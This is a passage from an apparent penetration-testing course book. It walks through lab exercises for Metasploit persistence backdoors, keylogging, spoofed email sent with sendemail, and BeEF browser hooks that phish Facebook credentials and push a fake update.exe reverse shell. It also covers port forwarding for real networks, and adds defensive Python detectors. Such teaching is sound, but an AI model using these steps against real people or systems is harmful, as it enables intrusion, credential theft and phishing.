Commands").
3. Download a file from the victim machine through the meterpreter command
meterpreter> download <file>
4. See the file on the Kali machine under /root (the directory msfconsole
was started from).

Note
To deal with Windows file or folder names that contain spaces,
put the name between single quotation marks: 'xxxx xxxx'.
5. Meterpreter also gives a direct Windows shell with meterpreter> shell.
To return to meterpreter, type exit in the shell (or press Control + C
and confirm terminating the channel).

7.4. Maintaining Access

The connections to the victim machine explained above are not persistent: the
connection stops when the victim machine is rebooted, and the backdoor
file will not start by itself again. In this section we will create a
persistent connection: once the backdoor is installed it will try to connect
to the attack machine (Kali) automatically every time the Windows machine
starts. We do this by registering the backdoor to start at logon (a Run
registry key that launches a dropped script).

Exercise 38: Maintaining Access using persistence mode

1. Disconnect the previous sessions and restart msfconsole.
2. Set up the listener again with persistence mode (see the commands
in the screenshot below; they are the handler options plus the
AutoRunScript persistence setting used in exercise 34).
3. Go to the Windows machine, run the malware file again, and watch the
msfconsole output.
4. The screenshot above is from msfconsole when the incoming connection
from the Windows machine is detected; msfconsole does the following
actions automatically:
- A meterpreter session is established between Kali and the Windows
machine.
- Persistence mode starts.
- Meterpreter writes a Visual Basic script (VBS) to Windows and
stores it under C:\Windows\Temp
- Meterpreter installs a Windows registry key to start the VBS script
automatically. The registry key:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\cnPksfSWgN
(the last name is generated randomly by the module)
5. In Kali exit msfconsole, run it again and set up the listener to
listen for the connection without the persistence commands.
6. Restart the Windows machine.
7. The connection will be established automatically.
8. The cleanup script that undoes the persistence mode is stored in Kali under
/root/.msf4/logs/persistence/<name of Windows
machine>/Name_of_session.rc
9. To clean up, just run the resource command from meterpreter
followed by the location of the rc file.
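The Run-key persistence set up in exercises 34 and 38 leaves two traces a defender can look for: a script dropped into a Temp directory and a Run value with a random-looking name. An added Python example (not from the book) that flags both in the text output of `reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run`; the listing is constructed, with the value name cnPksfSWgN taken from the book's screenshot and the other entries invented for contrast.

```python
import re

# Constructed 'reg query' output: one legitimate entry, the persistence module's
# entry (random name, VBS in Temp) and a plain executable run from Temp.
REG_QUERY = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive      REG_SZ    "C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    cnPksfSWgN    REG_SZ    C:\Windows\Temp\ZxkQwAs.vbs
    Updater       REG_SZ    C:\Users\user\AppData\Local\Temp\upd.exe
"""

REG_LINE = re.compile(r"^\s+(\S+)\s+(REG_(?:EXPAND_)?SZ)\s+(.*\S)\s*$")
SCRIPT_RE = re.compile(r"\.(vbs|js|jse|wsf|hta|ps1|bat|cmd)\b", re.I)
TEMP_DIRS = ("\\appdata\\local\\temp\\", "\\windows\\temp\\")
SCRIPT_HOSTS = ("wscript", "cscript", "mshta", "powershell", "rundll32", "regsvr32")


def looks_random(name: str) -> bool:
    """Heuristic for generated names such as cnPksfSWgN: letters only, 8+ long,
    and either almost no vowels or the case flips at least four times."""
    if len(name) < 8 or not name.isalpha():
        return False
    vowels = sum(c in "aeiouAEIOU" for c in name)
    flips = sum(a.isupper() != b.isupper() for a, b in zip(name, name[1:]))
    return vowels / len(name) < 0.2 or flips >= 4


def analyse_run_key(text: str) -> list:
    """Return the Run values that deserve a look, each with its reasons."""
    findings = []
    for line in text.splitlines():
        m = REG_LINE.match(line)
        if not m:
            continue
        name, _, value = m.groups()
        v = value.lower()
        reasons = []
        if any(d in v for d in TEMP_DIRS):
            reasons.append("runs from a Temp directory")
        if SCRIPT_RE.search(value):
            reasons.append("launches a script file")
        if any(h in v for h in SCRIPT_HOSTS):
            reasons.append("uses a script host")
        if looks_random(name):
            reasons.append("random-looking value name")
        if reasons:
            findings.append({"name": name, "value": value, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in analyse_run_key(REG_QUERY):
        print(f["name"], "->", "; ".join(f["reasons"]))
```

Run the same analysis over HKLM\...\Run and the RunOnce keys as well; the module used in the exercise writes to HKCU because that needs no elevation, but a privileged session could choose HKLM. The cleanup resource script in step 8 removes exactly the value this detector would flag.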

7.5. Key-logger and screenshots

Using meterpreter you can capture screenshots from the victim PC and all
keys typed by the victim, even passwords.
Exercise 39: Setting up Key-logger
1. This exercise is based on exercise 38, with the backdoor running
on the victim machine and already connected to the Kali machine.
2. With the backdoor explained in the previous section running under
meterpreter, you can capture keystrokes from the victim machine as follows:

meterpreter> keyscan_start

3. Go to the Windows machine and try to log in to Facebook or do any
other activity.
4. Come back to Kali and type:

meterpreter> keyscan_dump

5. You will see the keys entered on the Windows machine.
6. The Facebook user name [email protected] and the password
"facebook passord" are visible.
7. Stop the key scan:

meterpreter> keyscan_stop

8. To take a screenshot of the victim machine:

meterpreter> screenshot

8
Social
Engineering

Hackers use social engineering tactics because it is usually easier to
exploit your natural inclination to trust than it is to discover ways
to hack your software. For example, it is much easier to fool
someone into giving up his password than to hack the system
and extract his password (unless the password is weak).
Security is all about knowing who and what to trust. It is important
to know when and when not to take a person at their word, and whether
the person you are communicating with is who they say they are.
No matter how many locks and deadbolts are on your doors, if you
trust the person at the gate who says he is a pizza delivery guy and
you open the door for him without checking, you are completely
exposed to whatever risk he represents.

Social engineering depends on information gathering. In this
section, we are going to use social engineering tools to gather
information about victims, and we are going to use the Kali
sendemail tool with an SMTP relay to send spoofed emails to
victims.

8. Social Engineering
Social engineering depends on gathering information about the target,
whether the target is a person, a company or a web site. The methods of
information gathering do not need to be close to the target, unlike techniques
such as man in the middle. The type of information gathered about the
target includes their Facebook, LinkedIn and Google accounts, their friends,
which web sites they usually visit, and more. After gathering information about
the target, the attacker builds a strategy for gaining access to that
target, either by gaining their trust and sending them a backdoor or by
making them reveal their account password. There are many ways to gather
information about a person or an entity; some are free tools available on
the internet such as Google Dorks, others come preloaded with
Kali such as Recon-ng.
After gathering information, hackers start building a strategy to attack the
victim, which could be an email from a friend or another trusted source. Taking
advantage of trust and curiosity, the email may contain a
link that you just have to check out, and because the link comes from a friend
and you're curious, you'll trust the link and click on it, and be infected with
malware so the hacker can take over your machine, collect your contacts'
info and deceive them just as you were deceived. Or it may be a message with a
compelling story that your 'friend' is stuck in country X, has lost all his
money and needs you to send him money.
Social engineering may also take the form of bait: these schemes
know that if you dangle something people want, many people will
take the bait. They are often found on peer-to-peer sites offering a
download of something like a new movie, music, or software with a 'crack'.
8.1. Maltego
Maltego is a cross-platform application for performing link analysis. It
discovers relationships between entities and builds a visual representation of
different data with a graph-based layout. A transform is a process that pulls
new data related to an entity, automatically extending the graph.
Maltego is commonly used for reconnaissance in penetration testing
engagements and for open source intelligence analysis. It makes it possible to
understand the relationships between infrastructure, services and even users
when mapping an organization's attack surface.
There are two types of transforms within Maltego: one type runs on servers
remotely, the other can run locally on the system running Maltego.
Maltego comes installed in Kali Linux; you just need to register the first time
you run the tool in order to get the license.

Exercise 40: Running Maltego Tool

1. In Kali, go to Applications and run Maltego.
2. Click on Maltego CE (Free).
3. Choose to register and enter an email address and password; an email
will be sent to you to activate your Maltego account.
4. Start Maltego and choose to update the tool if there is an update.
5. After the update is done, choose to install the free APIs; every API has a
description of its function, such as querying a specific database.
6. Some APIs require a key; you need to register with the site
mentioned in the API and they will email you the key.
7. Click on the plus sign at the top of Maltego.
8. Choose what you want to search for from the left-side pane, for
example choose Domain, and drag and drop it in the middle area.
9. Right-click the domain and click on Run all transforms.
10. Click Run.
11. Maltego will use the installed transforms to search for the
domain you entered and display visual links for the found
information. You can verify every link and what kind of information it
provides, and you can do a deeper search on any item found.
12. You can use other tools to learn more about the items found; for
example you can use Shodan to find out more about a device, and if a
link is found, use the web browser to see the content of that link.

8.2. Email spoofing

Email spoofing is the most used method of delivering malware,
hacking or deceiving other people: sending them an email that looks
like it is coming from someone they know, with a backdoor attached, a link
to a harmful website, or a picture with embedded malware that runs
automatically when the picture is viewed.
This method depends on information gathering. When targeting a
victim, adversaries gather information about the victim from
social media and other tools to learn his friends, colleagues or the
companies he is associated with, and try to send him an email that looks
like it comes from a colleague or a friend.
Email spoofing is particularly important in penetration testing
because it is one of the tactics used to see whether company employees
will be fooled and give away valuable information just because
they received an email from someone who looks legitimate.
There are many ways to send a spoofed email, and many web
sites offer a free spoofed email service; just google for "spoof email
online". Most of the servers delivering this service are known to
spam blockers, and emails from them will be blocked or will end
up in the recipient's spam folder.
To get around this problem, either make your own email server if
you have a web hosting plan, or sign up for web hosting, create
your email server and use that to send the fake emails.
Or you can sign up for an SMTP relay service or a mail server. There
are many websites offering paid SMTP services, and you will
get good results because they are used by real marketers and
advertising companies to send email.
Here is a list of free SMTP services that can be used to send
emails:
SendinBlue, over 9000 free emails per month
(https://www.sendinblue.com/)
Constant Contact (https://www.constantcontact.com)
Elastic Email (https://www.elasticemail.com)
And there are more free or low-fee SMTP relay services,
including Google Gmail SMTP, MailGun and SendGrid.
Whatever relay is used, the receiving server checks the SPF, DKIM and
DMARC records of the domain in the From address: if that domain publishes
them, mail relayed from a server the domain does not authorize is flagged
or rejected by most providers, so a spoofed From address works best against
domains that publish no such records.

Exercise 41: Email Spoofing using Sendinblue server

1. Go to https://sendinblue.com
2. Sign up.
3. A confirmation email will be sent to your email address, where you can
finish the registration.
4. Click on the Transactional tab to see the authentication information
needed to send emails.

The information on this page will be used by the Kali sendemail tool: the SMTP
server, port, login and password.

5. Open a Kali terminal window:

#sendemail --help

#sendemail -xu <username from service provider> -xp <password> -s <smtp.relay.server_name:port number> -f "<spoofed sender name and address>" -t "<victim email address>" -u "<email subject>" -m "<email body>" -o tls=yes

The sender's display name goes into the -f value, in the form
"Display Name <address>"; -o takes options such as tls=yes, matching what
the relay's transactional page specifies for the port.

6. Use the sendemail command as explained above.
7. This is how the message will look in Gmail when it arrives in
the victim's mailbox.
8. And in Office 365, as in the following screenshot.

Note
Most email servers that use blacklist services will detect email from
sendinblue and other free SMTP relay services as spam or promotion, because
anti-spam vendors blacklist such services. In the exercise above Gmail
filed the mail under the Promotions folder and Office 365 showed that the email
came via sendinblue.com. The workaround is to use a web hosting email service or
a fake Gmail or other free mail account.
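Why a spoofed From address gets flagged even when the relay itself is reputable, as an added Python example (not the book's code): a minimal SPF evaluator that handles ip4/ip6 mechanisms, include and the all qualifier, run over constructed TXT records instead of DNS answers. The domain names and addresses are documentation values. A relay such as sendinblue connects from its own addresses, which the spoofed domain does not list, so the receiving server gets fail or softfail for the From domain.

```python
import ipaddress

RESULT = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}

# Constructed TXT records standing in for DNS lookups (documentation ranges).
SPF_RECORDS = {
    "victimcorp.example": "v=spf1 ip4:203.0.113.0/24 include:_spf.mailhost.example -all",
    "_spf.mailhost.example": "v=spf1 ip4:198.51.100.10 ip6:2001:db8:1::/48 ~all",
    "nospf.example": None,          # domain without an SPF record
}


def check_spf(domain: str, sender_ip: str, records=SPF_RECORDS, depth: int = 0) -> str:
    """Evaluate whether sender_ip may send mail for domain.
    Returns pass, fail, softfail, neutral, none or permerror.
    Handles ip4/ip6, include and all; a, mx, exists and redirect are out of
    scope for this example and are treated as non-matching."""
    if depth > 10:                      # RFC 7208 caps include recursion
        return "permerror"
    record = records.get(domain.lower())
    if not record or record.split()[0] != "v=spf1":
        return "none"
    ip = ipaddress.ip_address(sender_ip)
    for term in record.split()[1:]:
        qualifier = "+"
        if term[0] in RESULT:
            qualifier, term = term[0], term[1:]
        if term.startswith(("ip4:", "ip6:")):
            net = ipaddress.ip_network(term[4:], strict=False)
            if ip.version == net.version and ip in net:
                return RESULT[qualifier]
        elif term.startswith("include:"):
            # include matches only when the referenced record passes
            if check_spf(term[8:], sender_ip, records, depth + 1) == "pass":
                return RESULT[qualifier]
        elif term == "all":
            return RESULT[qualifier]
    return "neutral"                    # record ended without a match


def spoof_outcome(from_domain: str, relay_ip: str) -> str:
    """What a receiving server concludes about mail claiming from_domain
    but arriving from relay_ip."""
    r = check_spf(from_domain, relay_ip)
    return {"pass": "accepted as authorized",
            "fail": "rejected or quarantined (SPF hard fail)",
            "softfail": "delivered but marked suspicious/spam",
            "none": "no SPF policy: spoofed From is not contradicted"}.get(r, r)


if __name__ == "__main__":
    # A relay at 192.0.2.77 sends "From: ceo@victimcorp.example".
    print(spoof_outcome("victimcorp.example", "192.0.2.77"))
    print(spoof_outcome("nospf.example", "192.0.2.77"))
```

In a real check the records come from DNS TXT queries (for example `dig TXT victimcorp.example` on Kali), and DMARC then decides what to do with the SPF result; the logic of which addresses are authorized is the part shown here. For a penetration test this is also the quickest way to rank target domains: a domain returning "none" is the one a spoofed From address will reach.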
9
Web Browser Exploitation with
BeEF
BeEF stands for the Browser Exploitation Framework. It is a
penetration testing tool that focuses on the web browser. Amid
growing concerns about web-borne attacks against clients,
including mobile clients, BeEF allows the professional penetration
tester to assess the actual security posture of a target environment
by using client-side attack vectors. Unlike other security
frameworks, BeEF looks past the hardened network perimeter and
client system and examines exploitability within the context of the
one open door: the web browser. BeEF will hook one or more web
browsers and use them as bases for launching directed command
modules and further attacks against the system from within the
browser context. The BeEF framework provides a one-line JavaScript hook
that, when inserted in a website, hooks the website
visitors and creates a connection between the visitor's web browser
and the BeEF server, which then allows the attacker to run commands in the
visitor's browser.
BeEF comes preinstalled in older Kali versions (2019.2 and older),
so you should not have to install anything if you're running one of
those versions on your computer.
In mid-2019, Kali removed BeEF as a preinstalled exploitation
tool, moving it from "kali-linux-default" to the "kali-linux-large"
metapackage. That means that if you installed a fresh version of Kali
Linux, you will need to install BeEF manually.
In this section we are going to run BeEF and see how it hooks the
web browser and what commands can be sent from the BeEF server to
the victim browser.

9. Browser exploitation
Exercise 42: Browser Exploitation with BeEF
In this exercise we are going to use BeEF to hook and control users who
access the DVWA website (DVWA is a deliberately vulnerable website for testing
that comes as part of the Metasploitable virtual machine) by planting the BeEF
hook through its stored XSS vulnerability. The BeEF hook allows us to perform
many tasks in the victim's browser, like tricking the user into entering
Facebook credentials by making him think Facebook is asking him to log in
again, plus many other commands that we can run from the BeEF hook.
In a real-life scenario this is sent by hackers in a phishing email that
contains a link to a website where the hacker has either exploited an XSS
vulnerability or designed the website himself with the BeEF hook embedded
inside the page's JavaScript.
Note
If you are running Kali 2019.2 or older, BeEF comes already installed. If you
have a newer version of Kali such as 2019.3 and higher, including Kali 2020,
you will need to install BeEF manually. To check whether BeEF is installed
in the Kali version you have, go to Kali Applications and search for
BeEF; if it is not there, follow the BeEF installation procedure in point 8
below.

1. In Virtual Box Start Metasplotable virtual machine


S_E_Oblako
S_E_Oblako

2. Login to Metasploitable machine as msfadmin/msfadmin


3. Check its IP address #ifconfig

4. Open Kali and then web browser and go to DVWA page in


Metasplitable VM.

5. Click on Setup then click on Create/Reset Database to clear old


setting and scripts from DVWA database.
6. Click on XSS stored
7. From Kali search for BeEF and start it and log on to beef as
beef/beef
8. BeEF Installation
a. Kali 2020.1 does not ship BeEF, so you need to install it manually with
the following procedure (the exercise assumes BeEF is cloned into /opt/beef).
b. Clone the repository into /opt, then go to the beef folder:
#cd /opt
#sudo git clone https://github.com/beefproject/beef.git
#cd /opt/beef
c. #sudo ./install
d. The first time you start BeEF it refuses to run and reports that the
default username and password (beef/beef) are still in use.
e. Switch to the root account: #sudo su
f. Edit the file config.yaml in the beef folder with mousepad (or any text
editor) and save it:
#sudo su
#mousepad config.yaml
g. Change the username and password in the credentials section, save, and
start BeEF:
#./beef
9. If BeEF was installed manually, every time you want to run it do the
following:
#cd /opt/beef
#sudo ./beef
10. Open the web browser and go to http://127.0.0.1:3000/ui/authentication
11. Log in to the DVWA page on the Metasploitable server.
12. Set DVWA Security to low.
13. Click XSS Stored.
14. Copy the BeEF hook URL and wrap it in a script tag.
15. Enter the script that includes the BeEF hook in the message box of the
XSS Stored page. Make sure to change the IP address to the Kali IP address.
The message field only accepts 50 characters (its maxlength attribute), so
first change it from 50 to 500 (for example with the browser's Inspect
Element), then write the script inside the message body as shown below.
16. Click Sign Guestbook.
17. From the Windows 10 machine open a web browser, go to the Metasploitable
DVWA page, then click XSS stored. Now check the BeEF window in Kali: the
Windows 10 IP address appears under Online Browsers.
18. Click the IP address of the Windows 10 machine to get detailed
information about the machine and its browser.
19. Click Commands / Social Engineering / Pretty Theft, choose Facebook,
then click Execute.
20. Look at the Windows 10 browser: a Facebook login dialog appears. Enter a
username and password.
21. Go back to the BeEF page in Kali and see the information entered by the
victim user.
Note
We will learn more about the stored Cross-Site Scripting (XSS) vulnerability
used in this exercise in the Web penetration testing section.

9.1. Using BeEF to send backdoor
Exercise 43: Hacking Windows 10 using BeEF
When a user visits a website that carries the BeEF hook, the attacker sees
information about the machine browsing the site, such as its operating system
and browser type. The attacker can then push a fake update notification to
the victim's browser. If the user chooses to accept the update, BeEF serves a
reverse-shell backdoor; when the user runs it, the attacker gets a Metasploit
meterpreter session on the victim machine. As we saw in Client attacks,
meterpreter gives full control of the victim machine.
In this exercise we use the Kali web server, insert the BeEF JavaScript hook
into its index page, and then browse to that site from a Windows 10 machine.
BeEF sends a fake update to the Windows 10 browser user, and running it gives
us a meterpreter session.

1. Start the Kali virtual machine.
2. Start the Windows 10 virtual machine.
3. From the Kali machine start BeEF:
#cd /opt/beef
#./beef
4. Copy the hook URL.
5. Go to /var/www/html and edit the index.html file, adding the BeEF hook to
it with leafpad:
#leafpad /var/www/html/index.html
6. Add the following line (replace kali_IP with the Kali IP address):
<script src="http://kali_IP:3000/hook.js"></script>
7. Save the file.
8. Copy the reverse_https malware file that we created in Exercise 36
directly under /var/www/html and rename it update.exe.
9. Start the apache2 web server in Kali:
#service apache2 start
10. In Kali open a browser, go to the BeEF web page
http://127.0.0.1:3000/ui/authentication and log in to BeEF.
11. Start the Windows 10 machine.
12. Open the Firefox browser and go to the Kali website http://kali_ip_address
13. Look at the BeEF page in Kali: a new online browser is listed.
14. Highlight the machine to see its details.
15. In BeEF click Commands, then Social Engineering, then Fake Notification
Bar (Firefox).
16. Enter the URL of the malware file on the Kali web server (the Kali IP
address and the file name update.exe) and the notification text.
17. Start Metasploit in Kali and set up a handler listening for the incoming
connection from the malware file (same payload, LHOST and LPORT that were
used when the file was generated).
18. Go to Windows: a message bar appears in Firefox asking to update the
browser.
19. Click Install plugin; the update.exe file is downloaded to the Windows 10
machine.
20. Run the update.exe file.
21. Look at the Metasploit console: a meterpreter session is established.

9.2. Hooking up a Mobile phone
BeEF works with mobile phones (Android and iOS) the same way it works with
PCs, because it works through the web browser. You can even send malware to
an Android phone as an APK file and somehow convince the victim to install
and run it, which gives the attacker complete access to and control over the
phone.
If you want to test BeEF with a mobile phone, either run an Android emulator
on your PC (there are VirtualBox machine images that emulate Android), or use
an external server running Ubuntu or Kali with BeEF installed and a website
that contains the BeEF hook. Browse to the hooked website from the phone and
the phone's browser appears in the Online Browsers section in BeEF.
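Defenders see the hook from the other side: a page that suddenly loads a script from an origin that is not the site itself. The following Python check is an added example, not code from the book or from the BeEF project. It scans page HTML for script tags and flags the ones that point at a foreign host on BeEF's default port 3000 or at a file named hook.js; the two sample pages are constructed here, the first one carrying the hook exactly as it was planted in Exercise 42 (unquoted attribute and all).

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample pages (assumed content, not captured from DVWA).
HOOKED_PAGE = """<html><body><h1>Guestbook</h1>
<p>hello</p><script src=http://10.0.2.15:3000/hook.js></script>
<script src="/js/app.js"></script></body></html>"""
CLEAN_PAGE = """<html><body><h1>Guestbook</h1>
<script src="/js/app.js"></script>
<script src="https://cdn.example.com/lib.js"></script></body></html>"""


class ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> tag in a page."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        for name, value in attrs:
            if name.lower() == "src" and value:
                self.srcs.append(value)


def find_hook_scripts(html, site_host, beef_port=3000, hook_name="hook.js"):
    """Return the script URLs that look like a BeEF hook: an absolute URL to a
    host other than the site itself that uses BeEF's default port or ends in
    hook.js. Relative URLs are same-origin and are skipped."""
    parser = ScriptSrcCollector()
    parser.feed(html)
    suspicious = []
    for src in parser.srcs:
        url = urlparse(src)
        if not url.netloc:                       # relative: same origin
            continue
        foreign = url.hostname != site_host
        looks_like_hook = (url.port == beef_port
                           or url.path.endswith("/" + hook_name))
        if foreign and looks_like_hook:
            suspicious.append(src)
    return suspicious


if __name__ == "__main__":
    print(find_hook_scripts(HOOKED_PAGE, "10.0.2.5"))   # the planted hook
    print(find_hook_scripts(CLEAN_PAGE, "10.0.2.5"))    # nothing
```

The same function can be run over the body of every HTML response recorded by a proxy or by the web server's own scan of its stored guestbook entries; an attacker who changes BeEF's port defeats the port test but not the hook.js name unless they rename that too, so in practice both signals plus a list of approved script origins are used.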
10. Detecting Trojans
This is a short theoretical section about Trojans. After gaining a good
understanding of malware and Trojans through the previous sections of this
book, the reader should know what a Trojan is, how it differs from a virus,
what types of Trojans exist, how to protect a PC from them, and how to tell
that a file is a Trojan before running it on the PC.
10. Detecting Trojans
A Trojan horse, or Trojan, is a type of malicious code or software that looks
legitimate but can take control of your computer. A Trojan is designed to
steal, damage, disrupt, or in general inflict some other harmful action on
your data or network.
A Trojan looks like a normal, harmless file to trick you into loading and
executing the malware on your device; once installed, it performs the action
it was designed for.
A Trojan differs from a virus in that a virus can replicate itself, but a
Trojan cannot.
10.1. How Trojans work
You might think you have received an email from someone you know and click on
what looks like a legitimate attachment. But you have been fooled: the email
is from an attacker, and the file you clicked on, downloaded and opened has
gone on to install malware on your device. Once you execute the program, the
malware can do whatever it was built for, for example open a backdoor or
damage files on your computer.
10.2. Trojan Types
Backdoor Trojan: This Trojan creates a "backdoor" on your computer. It lets an
attacker access your computer and control it. Your data can be downloaded by
a third party and stolen, or more malware can be uploaded to your device.
Distributed Denial of Service (DDoS) attack Trojan: This Trojan performs DDoS
attacks. The idea is to take down a network by flooding it with traffic. That
traffic comes from your infected computer and others.
Downloader Trojan: This Trojan targets your already-infected computer. It
downloads and installs new versions of malicious programs. These can include
Trojans and adware.
Fake AV Trojan: This Trojan behaves like antivirus software but demands money
from you to detect and remove threats, whether they are real or fake.
Info stealer Trojan: As it sounds, this Trojan is after data on your infected
computer.
Mail finder Trojan: This Trojan seeks to steal the email addresses you have
accumulated on your device.
Ransom Trojan: This Trojan seeks a ransom to undo damage it has done to your
computer. This can include blocking your data or impairing your computer's
performance.
Remote Access Trojan: This Trojan gives an attacker full control over your
computer via a remote network connection. Its uses include stealing your
information or spying on you.
Rootkit Trojan: A rootkit aims to hide or obscure an object on your infected
computer. The idea is to extend the time a malicious program runs on your
device.
SMS Trojan: This type of Trojan infects your mobile device and can send and
intercept text messages. Texts to premium-rate numbers can drive up your
phone costs.
Trojan banker: This Trojan takes aim at your financial accounts. It is
designed to steal your account information for everything you do online,
including banking, credit card, and bill pay data.
Trojan IM: This Trojan targets instant messaging. It steals your logins and
passwords on IM platforms.
That is just a sample. There are many more.
10.3. Protect against Trojans
- Use up-to-date anti-virus/anti-malware software.
- Protect accounts with complex, unique passwords.
- Be careful with email attachments; scan an attachment before opening it.
- Do not visit unsafe websites. Some internet security software alerts you
when you are about to visit an unsafe site.
- Do not open a link in an email unless you are confident it comes from a
legitimate source and you know exactly where it leads. In general, avoid
opening unsolicited emails from senders you do not know.
- Do not click on pop-up windows that promise free programs that perform
useful tasks.

10.4. Manual Trojan detection
If you suspect that a file carries a Trojan, right-click the file and look at
its properties. If the file appears to be a JPG or PDF but carries a Trojan,
the properties show that it is actually an executable (.exe), and Windows 10
warns you that the file is executable when you try to run it; if you choose
"Run anyway", the backdoor is installed on your machine. Windows hides known
extensions by default, so a file named photo.jpg.exe is displayed as
photo.jpg; turn on "File name extensions" in Explorer to see the real one.
If you open Resource Monitor in Windows 10, you can see every process that
uses the network and which port it is using, which is where an unexpected
outbound connection from a freshly run "update" shows up.
10.5. Using a Sandbox
You can use a sandbox to analyze a file before running it on your machine. An
online sandbox is a service to which you upload the suspect file and which
then performs a complete analysis of it. Some data in the report is reserved
for the paid version, but what remains visible is enough for an expert eye to
tell that a file is suspicious. The sandbox used here is Hybrid Analysis:
https://www.hybrid-analysis.com/
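The manual check above (a file whose name says picture or document while its properties say executable) can be automated by comparing the file's first bytes with its extension. The following Python triage script is an added example, not code from the book; the sample files are constructed byte strings (a JPEG header, a PDF header and a minimal DOS/PE header), not real malware, and the list of executable extensions is an assumption you should extend for your environment.

```python
import struct


def fake_pe():
    """Constructed minimal DOS header whose e_lfanew field (offset 0x3C)
    points at a 'PE\\0\\0' signature at offset 0x80. Not a runnable binary."""
    dos_header = b"MZ\x90\x00" + b"\x00" * 56 + struct.pack("<I", 0x80)
    return dos_header + b"\x00" * (0x80 - len(dos_header)) + b"PE\x00\x00" + b"\x00" * 20


# Constructed sample files: name the user sees -> content on disk.
SAMPLE_FILES = {
    "holiday.jpg": b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 32,
    "holiday.jpg.exe": fake_pe(),     # double extension: Explorer shows holiday.jpg
    "report.pdf": b"%PDF-1.4\n%\xe2\xe3\xcf\xd3\n",
    "invoice.pdf": fake_pe(),         # .pdf name, executable content
}

MAGIC = {
    b"\xff\xd8\xff": "jpg",
    b"%PDF-": "pdf",
    b"MZ": "exe",
    b"\x89PNG\r\n\x1a\n": "png",
}
EXEC_EXTENSIONS = {"exe", "scr", "com", "dll", "bat", "cmd", "js", "vbs"}   # assumed list


def sniff_type(data):
    """Identify the real type from the file signature, not the name."""
    for magic, kind in MAGIC.items():
        if data.startswith(magic):
            return kind
    return "unknown"


def is_pe_file(data):
    """True if the DOS header's e_lfanew points at a PE signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def triage(name, data):
    """Return the reasons a file is suspicious (empty list if none)."""
    parts = name.lower().split(".")
    claimed = parts[-1] if len(parts) > 1 else ""
    actual = sniff_type(data)
    reasons = []
    if len(parts) > 2 and claimed in EXEC_EXTENSIONS:
        reasons.append("double extension: displayed as ." + parts[-2]
                       + " but runs as ." + claimed)
    if actual == "exe" and claimed not in EXEC_EXTENSIONS:
        kind = "PE executable" if is_pe_file(data) else "MZ executable"
        reasons.append(kind + " content inside a ." + claimed + " file")
    elif actual not in ("exe", "unknown") and claimed not in (
            actual, "jpeg" if actual == "jpg" else actual):
        reasons.append("content is " + actual + " but extension is ." + claimed)
    return reasons


def scan(files):
    """Triage a mapping of name -> bytes; keep only the files with findings."""
    return {name: triage(name, data) for name, data in files.items()
            if triage(name, data)}


if __name__ == "__main__":
    for name, reasons in scan(SAMPLE_FILES).items():
        print(name, "->", "; ".join(reasons))
```

To run it on real downloads, replace SAMPLE_FILES with the first few hundred bytes of each file read from disk; only the header is needed for the checks above, which is what makes this cheap enough to run on every file in a downloads folder before anything is opened.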
11. Gaining Access in Real Networks
In all the exercises so far we used the virtual environment created in
section 1. There is a small difference between doing those exercises in the
virtual environment and in a real environment, for example when you do a
penetration test for an organization. This section shows what the difference
is, how to set up the tools with real network IP addresses, and how to
forward connections from the local Wi-Fi router the tester is using to the
tester's machine.
11. Gaining access in real network
All the previous attacks, such as backdoors and BeEF, work in a real network
the same way as in the lab. The only difference is that by default the Wi-Fi
router in front of the attacker does not accept incoming connections from the
Internet, and even if it accepts them it does not know which internal machine
to deliver them to, because the victim connects to the router's public IP
address.
11.1. Configuring the router
You need to know the public IP address your Internet connection is using on
the router, and configure the router to forward incoming requests on a
specific port to the Kali machine.
Exercise 44: Gaining Access in Real Networks
Create a backdoor with the Veil Framework as in Exercise 29, but replace the
Kali local IP address with the router's public IP address:
- Check the router's public IP address by going to the whatsmyip.com page.
- Configure Veil with the public IP address and generate the backdoor.
Setting up Metasploit:
Metasploit is the program that makes the Kali machine listen for the incoming
connection. Its handler should be set with the internal IP address of the
Kali machine, not the public IP address, because the translation from public
to internal is done by the router.
Setting up the router:
Now we set the router to forward any connection coming in on port 8080 to the
Kali machine's internal IP address.
- Connect to the router over HTTP using the first IP address in the router's
range, such as 192.168.0.1.
- Log in to the router.
- Look for port forwarding (some routers call it IP forwarding or virtual
server) in the router settings.
- Add port 8080 and point it to the Kali machine's IP address, then save.
- Set up another rule for port 80 so the backdoor can be downloaded from the
Kali web server by the victim machine.
Remember that every forwarded port is now reachable from the whole Internet,
not only from the target, so remove the rules when the engagement is over.
Setting up BeEF for hooking browsers from outside:
- Change the IP address in the hook script tag to the public IP address.
- Set up router port forwarding to send connections coming in on port 3000
(the BeEF port) to the Kali machine's internal IP address.
12. Website Penetration Testing
Web penetration testing is the process of applying penetration testing
techniques to a web application to detect its vulnerabilities. It uses manual
or automated tests to identify vulnerabilities, security flaws or threats in
the application. In the following sections we focus on manual and automated
web pen testing techniques.
12. Website penetration testing
Web application penetration testing is a process in which we use penetration
testing and security skills to find vulnerabilities in web applications. It
plays an important role in every modern organization: if the organization
does not thoroughly test and secure its web apps, adversaries can compromise
these applications, damage business functionality, and steal data. The key
outcome of a web application penetration test is to identify security
weaknesses across the entire web application and its components (source
code, database, back-end network), to prioritize the identified
vulnerabilities and threats, and to propose ways to mitigate them.
12.1. Website (web application) components
- Server (hardware or virtual)
- Server operating system
- Web server software such as Apache or IIS
- Database such as MySQL
- Web application code such as PHP or Python
The first step of website penetration testing is gathering data about the
website: its IP address, domain registration information, website software
and much more. Many online resources provide this information, and other
tools can reveal the website's technology stack and its subdomains.
12.2. Website Information Gathering
- Whois lookup: http://whois.domaintools.com/
- W3dt.net (free online information gathering tools)
- https://pentest-tools.com/home (paid website with information gathering
tools)
The data you need to collect about a website before starting penetration
testing:
- IP address
- Domain name information
- Technologies used
- Other websites on the same server
